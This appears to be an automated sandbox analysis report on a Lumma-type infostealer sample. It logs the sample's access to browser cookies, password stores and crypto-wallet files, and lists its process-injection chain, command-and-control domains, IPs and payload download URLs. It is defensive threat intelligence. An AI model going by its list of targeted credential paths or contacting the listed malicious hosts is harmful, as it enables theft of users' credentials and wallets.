          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.dbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7084, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
          Source: Yara match, File source: Process Memory Space: msiexec.exe PID: 7084, type: MEMORYSTR
          Source: Yara match, File source: sslproxydump.pcap, type: PCAP
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: 2 Windows Management Instrumentation; 1 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job
          Persistence: 11 DLL Side-Loading; 1 Create Account; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
          Privilege Escalation: 1 Abuse Elevation Control Mechanism; 11 DLL Side-Loading; 212 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job
          Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 11 DLL Side-Loading; 121 Masquerading; 12 Virtualization/Sandbox Evasion; 212 Process Injection
          Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: 1 System Time Discovery; 11 File and Directory Discovery; 265 System Information Discovery; 451 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 2 Process Discovery; Remote System Discovery; System Owner/User Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: 1 Archive Collected Data; 31 Data from Local System; 1 Screen Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
          Behavior Graph ID: 1557280, Sample: Setup.exe, Startdate: 18/11/2024, Architecture: WINDOWS, Score: 100
          DNS/IP: sliperyedhby.icu; steamcommunity.com; cdn1.pixel-story.shop
          Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
          Setup.exe (started)
            Signatures: Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
            -> choice.exe (started)
               Dropped: C:\Users\user\AppData\Local\Temp\cbaxoydi, PE32
               Signatures: Writes to foreign memory regions; Found hidden mapped module (file has been removed from disk); Maps a DLL or memory area into another process; 2 other signatures
               -> conhost.exe (started)
               -> msiexec.exe (started)
                  DNS/IP: sliperyedhby.icu 172.67.131.254, 443, 49704, 49706, CLOUDFLARENETUS, United States
                  DNS/IP: cdn1.pixel-story.shop 172.67.185.54, 443, 49715, 49716, CLOUDFLARENETUS, United States
                  Dropped: C:\Users\user\AppData\Roaming\7LUEA3.pif, PE32
                  Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Drops PE files with a suspicious file extension; 3 other signatures
                  -> 7LUEA3.pif (started)
                     Dropped: C:\dfbffdd\AutoIt3.exe, PE32
                     -> InstallUtil.exe (started)
                        DNS/IP: 62.60.234.80, 1466, 49719, 49721, ASLINE-AS-APASLINELIMITEDHK, Iran (ISLAMIC Republic Of)
                        DNS/IP: steamcommunity.com 104.102.49.254, 443, 49718, AKAMAI-ASUS, United States
                     -> InstallUtil.exe (started)
                     -> InstallUtil.exe (started)

          Source | Detection | Scanner | Label | Link
          Setup.exe | 29% | ReversingLabs | Win32.Trojan.Leonem |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\cbaxoydi | 100% | Avira | HEUR/AGEN.1316118 |
          C:\Users\user\AppData\Local\Temp\cbaxoydi | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Temp\cbaxoydi | 66% | ReversingLabs | Win32.Spyware.Lummastealer |
          C:\Users\user\AppData\Roaming\7LUEA3.pif | 0% | ReversingLabs | |
          C:\dfbffdd\AutoIt3.exe | 0% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          http://www.valvesoftware.com/legal.htmhttps://store.steampowered.com/steam_refunds/responsive_page_m | 0% | Avira URL Cloud | safe |
          https://cdn1.pixel-story.shop/ldr_cp_pa05c5df6HOMEDRIVE=C:HOMEPATH= | 100% | Avira URL Cloud | malware |
          https://cdn1.pixel-story.shop/runcl.bin | 100% | Avira URL Cloud | malware |
          http://crl.microsoft; | 0% | Avira URL Cloud | safe |
          https://sliperyedhby.icu/V1 | 0% | Avira URL Cloud | safe |
          https://sliperyedhby.icu/api | 0% | Avira URL Cloud | safe |
          https://cdn1.pixel-story.shop/clp_pa.32n | 100% | Avira URL Cloud | malware |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          steamcommunity.com | 104.102.49.254 | true | false | | high
          cdn1.pixel-story.shop | 172.67.185.54 | true | false | | high
          sliperyedhby.icu | 172.67.131.254 | true | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          https://cdn1.pixel-story.shop/runcl.bin | false | Avira URL Cloud: malware | unknown
          thicktoys.sbs | false | | high
          faintbl0w.sbs | false | | high
          https://steamcommunity.com/profiles/76561198043764602 | false | | high
          3xc1aimbl0w.sbs | false | | high
          https://sliperyedhby.icu/api | true | Avira URL Cloud: safe | unknown
          300snails.sbs | false | | high
                                                                                                                              high
                                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=englishInstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/my/wishlist/https://store.steampowered.com/points/shop/https://store.steaInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.autoitscript.com/autoit3/X7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1603850920.00000000098D9000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000000.1561712933.0000000000915000.00000002.00000001.01000000.0000000A.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:msiexec.exe, 00000005.00000003.1341942222.0000000006523000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&amp;l=enInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtdtls:7LUEA3.pif, 0000000C.00000003.1620448866.0000000009D30000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1630485888.0000000009320000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1673281933.0000000006590000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 0000000F.00000002.2451954352.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sketchfab.comInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.ecosia.org/newtab/msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.symauth.com/cps0(Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://lv.queniujq.cnInstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=akmtVhyxSS8B&amp;l=eInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmsiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.youtube.com/InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=BqN7WqGLHNiU&lInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/privacy_agreement/InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://cdn.fastly.steamstatic.com/steamcommunity/public/images/apps/34830/98fd6d79ce619a30152b86e08InstallUtil.exe, 0000000F.00000002.2492246626.0000000001882000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/profiles/76561198043764602/games/InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cdn1.pixel-story.shop/clp_pa.32nmsiexec.exe, 00000005.00000003.1582101958.0000000003568000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.0000000003570000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    unknown
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=englisInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=akmtVhyxSS8B&l=engliInstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://steamcommunity.com/app/34830InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.symauth.com/rpa00Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.com/profiles/76561198043764602/badges/1InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
